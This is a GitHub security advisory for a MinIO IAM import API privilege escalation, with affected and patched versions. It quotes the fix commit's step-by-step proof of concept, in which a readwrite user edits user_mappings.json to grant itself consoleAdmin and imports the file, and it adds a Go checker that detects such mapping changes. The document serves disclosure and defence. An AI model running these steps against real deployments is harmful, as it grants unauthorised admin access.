Headline
GHSA-cwq8-g58r-32hg: MinIO vulnerable to privilege escalation in IAM import API
Impact
Privilege escalation in the IAM import API; all users are impacted since MinIO commit 580d9db85e04f1b63cc2909af50f0ed08afa965f.
Patches
commit f246c9053f9603e610d98439799bdd2a6b293427
Author: Aditya Manthramurthy <[email protected]>
Date: Wed Dec 11 18:09:40 2024 -0800
fix: Privilege escalation in IAM import API (#20756)
This API had missing permissions checking, allowing a user to change their policy mapping by:
1. Craft iam-info.zip file: Update own user permission in user_mappings.json
2. Upload it via `mc admin cluster iam import nobody iam-info.zip`
Here `nobody` can be a user with pretty much any kind of permission (but not anonymous) and this ends up working.
Some more detailed steps - start from a fresh setup:
```
./minio server /tmp/d{1...4} &
mc alias set myminio http://localhost:9000 minioadmin minioadmin
mc admin user add myminio nobody nobody123
mc admin policy attach myminio readwrite nobody nobody123
mc alias set nobody http://localhost:9000 nobody nobody123
mc admin cluster iam export myminio
mkdir /tmp/x && mv myminio-iam-info.zip /tmp/x
cd /tmp/x
unzip myminio-iam-info.zip
echo '{"nobody":{"version":1,"policy":"consoleAdmin","updatedAt":"2024-08-13T19:47:10.1Z"}}' > \
iam-assets/user_mappings.json
zip -r myminio-iam-info-updated.zip iam-assets/
mc admin cluster iam import nobody ./myminio-iam-info-updated.zip
mc admin service restart nobody
```
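The tampering the commit message describes is a rewritten entry in iam-assets/user_mappings.json. As an added defensive example (not code from the advisory or the MinIO project), the Go program below diffs a freshly exported user_mappings.json against the one found inside a zip before it is imported and reports any user whose mapping would gain a privileged policy; it assumes the policy value is a comma-separated list of policy names and that the `consoleAdmin` watch list is adjusted per deployment.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// mappedPolicy is one entry of iam-assets/user_mappings.json as in the advisory's
// sample; the policy value is assumed to be a comma-separated list of policy names.
type mappedPolicy struct{ Policy string `json:"policy"` }

// Finding records a user whose candidate mapping gains a privileged policy.
type Finding struct{ User, Before, After string }

// privilegedPolicies is an assumed watch list; extend it for your deployment.
var privilegedPolicies = map[string]bool{"consoleAdmin": true}

func policySet(list string) map[string]bool {
	set := map[string]bool{}
	for _, p := range strings.Split(list, ",") {
		set[strings.TrimSpace(p)] = true
	}
	return set
}

// AuditMappings compares a fresh export (current) with the user_mappings.json inside
// a zip about to be imported (candidate) and reports every user whose policy set
// would newly include a privileged policy.
func AuditMappings(current, candidate []byte) ([]Finding, error) {
	var cur, cand map[string]mappedPolicy
	if err := json.Unmarshal(current, &cur); err != nil {
		return nil, fmt.Errorf("current export: %w", err)
	}
	if err := json.Unmarshal(candidate, &cand); err != nil {
		return nil, fmt.Errorf("candidate import: %w", err)
	}
	var findings []Finding
	for user, m := range cand {
		before := policySet(cur[user].Policy) // user unmapped today -> {"": true}
		for p := range policySet(m.Policy) {
			if privilegedPolicies[p] && !before[p] {
				findings = append(findings, Finding{user, cur[user].Policy, m.Policy})
				break
			}
		}
	}
	return findings, nil
}

func main() { // constructed inputs: the advisory's readwrite user, then the tampered mapping
	cur := []byte(`{"nobody":{"version":1,"policy":"readwrite","updatedAt":"2024-08-13T19:47:10.1Z"}}`)
	cand := []byte(`{"nobody":{"version":1,"policy":"consoleAdmin","updatedAt":"2024-08-13T19:47:10.1Z"}}`)
	findings, err := AuditMappings(cur, cand)
	fmt.Println(findings, err) // [{nobody readwrite consoleAdmin}] <nil>
}
```

Running this against the export and the candidate zip before `mc admin cluster iam import` gives an operator a record of every privilege gain the import would apply, whether the zip was tampered with or not.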
Workarounds
No workarounds are possible; all users are advised to upgrade immediately.
References
Refer to https://github.com/minio/minio/pull/20756 for more information.
High severity GitHub Reviewed Published Dec 15, 2024 in minio/minio • Updated Dec 16, 2024
Package
gomod github.com/minio/minio (Go)
Affected versions
>= 0.0.0-20220623162515-580d9db85e04, < 0.0.0-20241213221912-68b004a48f41
Patched versions
0.0.0-20241213221912-68b004a48f41
References
- GHSA-cwq8-g58r-32hg
- minio/minio#20756
- minio/minio@580d9db
- minio/minio@f246c90
Published to the GitHub Advisory Database
Dec 16, 2024
Last updated
Dec 16, 2024